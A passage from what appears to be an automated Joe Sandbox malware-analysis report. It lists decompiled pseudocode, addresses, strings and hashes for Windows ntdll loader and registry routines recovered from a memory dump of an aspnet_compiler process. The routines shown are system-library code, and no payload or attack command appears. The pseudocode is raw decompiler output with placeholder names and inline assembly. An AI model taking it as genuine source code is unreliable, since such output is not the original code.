										E01215510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1285780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E011A849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E011A8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E011A8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1285c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1285c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E011B2280(_t92, 0x12886cc);
															_t94 = E01269DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E011C61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1285c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E011A8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1285c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1285c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E011DF380(_t136, 0x1171184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E011B2280(_t108, 0x12886cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E011C61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01269D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E011AFFB0(_t118, _t156, 0x12886cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E011D9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                        0x011a8799
                                                                                        0x011a879d
                                                                                        0x011a87a1
                                                                                        0x011a87a3
                                                                                        0x011a87a8
                                                                                        0x011a87c3
                                                                                        0x011a87c3
                                                                                        0x011a87c8
                                                                                        0x011a87d1
                                                                                        0x011a87d4
                                                                                        0x011a87d8
                                                                                        0x011a87e5
                                                                                        0x011a87ec
                                                                                        0x011f9bfe
                                                                                        0x011f9c00
                                                                                        0x011f9c02
                                                                                        0x011f9c08
                                                                                        0x011f9c0d
                                                                                        0x011f9c0f
                                                                                        0x011f9c14
                                                                                        0x011f9c2d
                                                                                        0x011f9c32
                                                                                        0x011f9c37
                                                                                        0x011f9c3a
                                                                                        0x011f9c3c
                                                                                        0x011f9c42
                                                                                        0x011f9c42
                                                                                        0x011f9c3c
                                                                                        0x011f9c02
                                                                                        0x011a87da
                                                                                        0x011a87df
                                                                                        0x011a87e3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a87e3
                                                                                        0x011a87f2
                                                                                        0x00000000
                                                                                        0x011a87fb
                                                                                        0x011a87fd
                                                                                        0x011a87fe
                                                                                        0x011a880e
                                                                                        0x011a880f
                                                                                        0x011a8810
                                                                                        0x011a8814
                                                                                        0x011a881a
                                                                                        0x011a881c
                                                                                        0x011a881f
                                                                                        0x011a8821
                                                                                        0x011a8822
                                                                                        0x011a8824
                                                                                        0x011a8826
                                                                                        0x011a882c
                                                                                        0x011a882e
                                                                                        0x011f9c48
                                                                                        0x011f9c48
                                                                                        0x011a8834
                                                                                        0x011a8834
                                                                                        0x011a8837
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a8837
                                                                                        0x011a882e
                                                                                        0x011a883d
                                                                                        0x011a8840
                                                                                        0x011a8843
                                                                                        0x011a8846
                                                                                        0x011a8849
                                                                                        0x011a884c
                                                                                        0x011a884e
                                                                                        0x011a8850
                                                                                        0x011a8852
                                                                                        0x011a8854
                                                                                        0x011a8857
                                                                                        0x011a88b4
                                                                                        0x011a88b6
                                                                                        0x011a88b6
                                                                                        0x011a8859
                                                                                        0x011a8859
                                                                                        0x011a8859
                                                                                        0x011a8861
                                                                                        0x011a8866
                                                                                        0x011a886a
                                                                                        0x011a893d
                                                                                        0x011a8941
                                                                                        0x00000000
                                                                                        0x011a8947
                                                                                        0x011a8947
                                                                                        0x011a894a
                                                                                        0x011a894c
                                                                                        0x00000000
                                                                                        0x011a8952
                                                                                        0x011a8955
                                                                                        0x011a895a
                                                                                        0x011a895d
                                                                                        0x011a895d
                                                                                        0x011a895f
                                                                                        0x011a8961
                                                                                        0x011a8961
                                                                                        0x011a8968
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a896a
                                                                                        0x011a896b
                                                                                        0x011a896e
                                                                                        0x00000000
                                                                                        0x011a8970
                                                                                        0x011a8970
                                                                                        0x011a8970
                                                                                        0x011a8970
                                                                                        0x011a8972
                                                                                        0x011a8972
                                                                                        0x011a8974
                                                                                        0x00000000
                                                                                        0x011a897a
                                                                                        0x011a897a
                                                                                        0x011a897d
                                                                                        0x00000000
                                                                                        0x011a8983
                                                                                        0x011f9c65
                                                                                        0x011f9c6d
                                                                                        0x011f9c72
                                                                                        0x011f9c75
                                                                                        0x011f9c75
                                                                                        0x011f9c82
                                                                                        0x011f9c86
                                                                                        0x011f9c87
                                                                                        0x011f9c88
                                                                                        0x011f9c89
                                                                                        0x011f9c8c
                                                                                        0x011f9c90
                                                                                        0x011f9c95
                                                                                        0x011f9c97
                                                                                        0x011f9ca0
                                                                                        0x011f9ca3
                                                                                        0x011f9ca9
                                                                                        0x011f9ca9
                                                                                        0x00000000
                                                                                        0x011f9ca9
                                                                                        0x011f9ca3
                                                                                        0x00000000
                                                                                        0x011f9c97
                                                                                        0x011a897d
                                                                                        0x00000000
                                                                                        0x011a8974
                                                                                        0x011a8988
                                                                                        0x011a8992
                                                                                        0x011a8996
                                                                                        0x00000000
                                                                                        0x011a8996
                                                                                        0x011a894c
                                                                                        0x00000000
                                                                                        0x011a8870
                                                                                        0x011a887b
                                                                                        0x011a887d
                                                                                        0x011a887f
                                                                                        0x011a8881
                                                                                        0x011a8884
                                                                                        0x011a8884
                                                                                        0x011a8886
                                                                                        0x011a8889
                                                                                        0x011a888c
                                                                                        0x011a888e
                                                                                        0x011a8891
                                                                                        0x011a8891
                                                                                        0x011a8898
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a889a
                                                                                        0x011a889b
                                                                                        0x011a889e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a88a0
                                                                                        0x011a88a8
                                                                                        0x011a88b0
                                                                                        0x011a88b2
                                                                                        0x011a88d3
                                                                                        0x011a88d5
                                                                                        0x00000000
                                                                                        0x011a88d7
                                                                                        0x011a88db
                                                                                        0x011a88dc
                                                                                        0x011a88e0
                                                                                        0x011a88e8
                                                                                        0x011a88ee
                                                                                        0x011a88f0
                                                                                        0x011a88f3
                                                                                        0x011a88fc
                                                                                        0x011a8901
                                                                                        0x011a8906
                                                                                        0x011a890c
                                                                                        0x011a890c
                                                                                        0x011a890f
                                                                                        0x011a8916
                                                                                        0x011a8917
                                                                                        0x011a8918
                                                                                        0x011a8919
                                                                                        0x011a891a
                                                                                        0x011a891f
                                                                                        0x011a8921
                                                                                        0x011f9c52
                                                                                        0x011f9c55
                                                                                        0x011f9c5b
                                                                                        0x011f9cac
                                                                                        0x011f9cc0
                                                                                        0x011f9cc0
                                                                                        0x011f9c55
                                                                                        0x011a8927
                                                                                        0x011a8927
                                                                                        0x011a892f
                                                                                        0x011a8933
                                                                                        0x00000000
                                                                                        0x011a88f5
                                                                                        0x011a88f5
                                                                                        0x00000000
                                                                                        0x011a88f7
                                                                                        0x011a88f7
                                                                                        0x011a88fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a88fa
                                                                                        0x011a88f5
                                                                                        0x011a88f3
                                                                                        0x00000000
                                                                                        0x011a88d5
                                                                                        0x00000000
                                                                                        0x011a88b2
                                                                                        0x011a88c9
                                                                                        0x00000000
                                                                                        0x011a88c9
                                                                                        0x011a887f
                                                                                        0x011a886a
                                                                                        0x011a8857
                                                                                        0x011a8852
                                                                                        0x011a88bf
                                                                                        0x011a88bf
                                                                                        0x011a87aa
                                                                                        0x011a87ad
                                                                                        0x011a87ae
                                                                                        0x011a87b4
                                                                                        0x011a87b5
                                                                                        0x011a87b6
                                                                                        0x011a87b8
                                                                                        0x011a87bd
                                                                                        0x011a87c1
                                                                                        0x011a87f4
                                                                                        0x011a87fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a87c1
                                                                                        0x00000000

                                                                                        Strings
                                                                                        • LdrpDoPostSnapWork, xrefs: 011F9C1E
                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 011F9C28
                                                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 011F9C18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                        • API String ID: 2994545307-1948996284
                                                                                        • Opcode ID: bc9b2d2fe417596b5baaae9269d4788942fa85d7688be6f5b20363e3e273b428
                                                                                        • Instruction ID: b2d193d64da60ad94a474f4ecaccea2a10735fcbc57d49f7218c65ff3a23c812
                                                                                        • Opcode Fuzzy Hash: bc9b2d2fe417596b5baaae9269d4788942fa85d7688be6f5b20363e3e273b428
                                                                                        • Instruction Fuzzy Hash: 5B910475A0021A9FEB1CDF59D480ABE7FB5FF84316B85406DEA05AB241EB30ED41CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011A7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E011A7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E011ACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0119C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1285780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01215510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1285780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E011B7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E011B7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01217016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E011B7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E011B7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01217016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E011CA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0119B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                        0x011a7e4c
                                                                                        0x011a7e50
                                                                                        0x011a7e55
                                                                                        0x011a7e58
                                                                                        0x011a7e5d
                                                                                        0x011a7e71
                                                                                        0x011a7f33
                                                                                        0x011a7e77
                                                                                        0x011a7e77
                                                                                        0x011a7e79
                                                                                        0x011a7e79
                                                                                        0x011a7e7e
                                                                                        0x011a7f45
                                                                                        0x011f9848
                                                                                        0x00000000
                                                                                        0x011f9848
                                                                                        0x011a7f4e
                                                                                        0x011a7f53
                                                                                        0x011a7f5a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f985a
                                                                                        0x011f9862
                                                                                        0x011f9866
                                                                                        0x00000000
                                                                                        0x011f986c
                                                                                        0x00000000
                                                                                        0x011f986c
                                                                                        0x011a7e84
                                                                                        0x011a7e84
                                                                                        0x011a7e8d
                                                                                        0x011f9871
                                                                                        0x011a7eb8
                                                                                        0x011a7ec0
                                                                                        0x011a7ec0
                                                                                        0x011a7e9a
                                                                                        0x011f987e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f9884
                                                                                        0x011f988b
                                                                                        0x011f98a7
                                                                                        0x011f98ac
                                                                                        0x011f98b1
                                                                                        0x011f98b6
                                                                                        0x011f98b8
                                                                                        0x011f98b8
                                                                                        0x011f98b9
                                                                                        0x00000000
                                                                                        0x011f98b9
                                                                                        0x011a7ea0
                                                                                        0x011a7ea7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a7eac
                                                                                        0x011a7eb1
                                                                                        0x011a7ec6
                                                                                        0x011a7ed0
                                                                                        0x011f98cc
                                                                                        0x011a7ed6
                                                                                        0x011a7ed6
                                                                                        0x011a7ed6
                                                                                        0x011a7ede
                                                                                        0x011a7ee3
                                                                                        0x011f98e3
                                                                                        0x011f98f0
                                                                                        0x011f9902
                                                                                        0x011f98f2
                                                                                        0x011f98fb
                                                                                        0x011f98fb
                                                                                        0x011f9907
                                                                                        0x011f991d
                                                                                        0x011f991d
                                                                                        0x011f9907
                                                                                        0x011f98e3
                                                                                        0x011a7ef0
                                                                                        0x011a7f14
                                                                                        0x011a7f14
                                                                                        0x011a7f1e
                                                                                        0x011f9946
                                                                                        0x011a7f24
                                                                                        0x011a7f24
                                                                                        0x011a7f24
                                                                                        0x011a7f2c
                                                                                        0x011f996a
                                                                                        0x011f9975
                                                                                        0x011f9975
                                                                                        0x011f997e
                                                                                        0x011f9993
                                                                                        0x011f9993
                                                                                        0x011f997e
                                                                                        0x00000000
                                                                                        0x011a7ef2
                                                                                        0x011a7efc
                                                                                        0x011a7f0a
                                                                                        0x011a7f0e
                                                                                        0x011f9933
                                                                                        0x00000000
                                                                                        0x011f9933
                                                                                        0x00000000
                                                                                        0x011a7f0e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a7eb1

                                                                                        Strings
                                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 011F9891
                                                                                        • LdrpCompleteMapModule, xrefs: 011F9898
                                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 011F98A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                        • API String ID: 0-1676968949
                                                                                        • Opcode ID: a85553698c09d160cc631f1e7df8a880b7a6bd4b623a0e7edc14a91913f7db29
                                                                                        • Instruction ID: 596d9c3ffdf3861fa0a7f6c925fb616c2409025984ca664b701357ef3c81a97c
                                                                                        • Opcode Fuzzy Hash: a85553698c09d160cc631f1e7df8a880b7a6bd4b623a0e7edc14a91913f7db29
                                                                                        • Instruction Fuzzy Hash: 2A5101356007899BEB2EDB6CC844B6A7FE4BB80318F450599EA519B3D1D731EE00CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0119E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E0119E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0119F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E011D95D0();
						}
						if(_t78 != 0) {
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E011DFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E011DBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E011D9600();
					if(_t97 < 0) {
						goto L6;
					}
					E011DBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0119F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E011DBB40(_t83, _t102 + 0x24, _t78);
								if(L011A43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E011DBB40(_t84, _t102 + 0x24, _t94);
									if(L011A43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                        0x0119e620
                                                                                        0x0119e628
                                                                                        0x0119e62f
                                                                                        0x0119e631
                                                                                        0x0119e635
                                                                                        0x0119e637
                                                                                        0x0119e63e
                                                                                        0x011f5503
                                                                                        0x011f5503
                                                                                        0x0119e64c
                                                                                        0x0119e64c
                                                                                        0x0119e651
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0119e661
                                                                                        0x0119e665
                                                                                        0x011f542a
                                                                                        0x0119e715
                                                                                        0x0119e71a
                                                                                        0x0119e71c
                                                                                        0x0119e720
                                                                                        0x0119e720
                                                                                        0x0119e727
                                                                                        0x0119e736
                                                                                        0x0119e736
                                                                                        0x0119e743
                                                                                        0x0119e743
                                                                                        0x0119e673
                                                                                        0x0119e678
                                                                                        0x0119e67d
                                                                                        0x0119e682
                                                                                        0x0119e685
                                                                                        0x0119e692
                                                                                        0x0119e69b
                                                                                        0x0119e6a3
                                                                                        0x0119e6ad
                                                                                        0x0119e6b1
                                                                                        0x0119e6b2
                                                                                        0x0119e6bb
                                                                                        0x0119e6bf
                                                                                        0x0119e6c0
                                                                                        0x0119e6c8
                                                                                        0x0119e6cc
                                                                                        0x0119e6d5
                                                                                        0x0119e6d9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0119e6e5
                                                                                        0x0119e6ea
                                                                                        0x0119e6f9
                                                                                        0x0119e70b
                                                                                        0x0119e70f
                                                                                        0x011f5439
                                                                                        0x011f545e
                                                                                        0x011f545e
                                                                                        0x00000000
                                                                                        0x011f545e
                                                                                        0x011f543b
                                                                                        0x011f543e
                                                                                        0x011f5440
                                                                                        0x011f5445
                                                                                        0x011f5472
                                                                                        0x011f5475
                                                                                        0x011f548d
                                                                                        0x011f5493
                                                                                        0x011f54a9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f54ab
                                                                                        0x011f54b4
                                                                                        0x011f54bc
                                                                                        0x011f54c8
                                                                                        0x011f54de
                                                                                        0x011f54fb
                                                                                        0x011f54e0
                                                                                        0x011f54e6
                                                                                        0x011f54eb
                                                                                        0x011f54eb
                                                                                        0x011f54de
                                                                                        0x00000000
                                                                                        0x011f54bc
                                                                                        0x011f5477
                                                                                        0x011f547a
                                                                                        0x011f5480
                                                                                        0x011f5483
                                                                                        0x011f5486
                                                                                        0x011f548b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f548b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f5447
                                                                                        0x011f5447
                                                                                        0x011f5447
                                                                                        0x011f5447
                                                                                        0x011f544e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f5450
                                                                                        0x011f5452
                                                                                        0x011f5455
                                                                                        0x011f545a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f545c
                                                                                        0x011f546a
                                                                                        0x011f546d
                                                                                        0x011f546f
                                                                                        0x00000000
                                                                                        0x011f546f
                                                                                        0x0119e70f

                                                                                        Strings
                                                                                        • InstallLanguageFallback, xrefs: 0119E6DB
                                                                                        • @, xrefs: 0119E6C0
                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0119E68C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
